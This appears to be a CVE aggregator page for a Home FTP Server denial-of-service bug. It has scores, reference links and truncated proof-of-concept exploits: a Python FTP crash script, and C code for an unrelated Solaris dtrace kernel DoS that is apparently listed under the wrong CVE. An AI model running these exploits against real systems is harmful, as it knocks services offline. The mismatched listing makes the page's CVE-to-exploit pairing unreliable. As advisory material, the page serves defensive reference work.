CVE-2008-1478
published 2008-03-24CVE-2008-1478: Home FTP Server 1.4.5.89 allows remote attackers to cause a denial of service (crash) by opening a FTP passive mode connection, then closing the original FTP…
PriorityP419medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
2.88%
85.1th percentile
Home FTP Server 1.4.5.89 allows remote attackers to cause a denial of service (crash) by opening a FTP passive mode connection, then closing the original FTP connection. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ari_pikivirta | home_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
exploitdb·2009-05-04
CVE-2009-1478 Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
---
/* solaris-dtrace-dos.c
*
* Copyright (c) 2008 by
*
* Solaris >= 10/Opensolaris local kernel DoS POC
* by mu-b - Mon 17 Nov 2008
*
* - Tested on: Sun Solaris 10 (SPARC)
* Sun OpenSolaris
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DTRACE_HELPER "/dev/dtrace/helper"
static unsigned int changes = 0;
void *
hammer (void *arg)
{
struct dof_hdr *phdr;
phdr = arg;
while (1)
{
phdr->dofh_loadsz = -1;
changes++;
usleep (10);
}
}
int
main (int argc, char **argv)
{
union {
struct dof_hdr hdr;
unsigned char buf[256*1024];
} hdr_t;
struct dof_hdr *phdr;
int i, fd, n, tid;
printf ("Solaris >= 10/Opensolaris local kernel DoS PoC\n"
"by: \n"
"http://www.digit-labs.org/ -- D
Exploit-DB
Home FTP Server 1.4.5 - Remote Denial of Service
exploitdb·2008-03-17
CVE-2008-1478 Home FTP Server 1.4.5 - Remote Denial of Service
Home FTP Server 1.4.5 - Remote Denial of Service
---
# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# Thats not overflow, it's probubly in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
# Debug:
# ----------------------
# | EIP: 0100FE98 |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4 |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = '[email protected]'
print '-------------------------------'
print '| HOME FTP S
No writeups or analysis indexed.
http://secunia.com/advisories/29419http://securityreason.com/securityalert/3766http://www.securityfocus.com/archive/1/489706/100/0/threadedhttp://www.securityfocus.com/bid/28283https://www.exploit-db.com/exploits/5270http://secunia.com/advisories/29419http://securityreason.com/securityalert/3766http://www.securityfocus.com/archive/1/489706/100/0/threadedhttp://www.securityfocus.com/bid/28283https://www.exploit-db.com/exploits/5270
2008-03-24
Published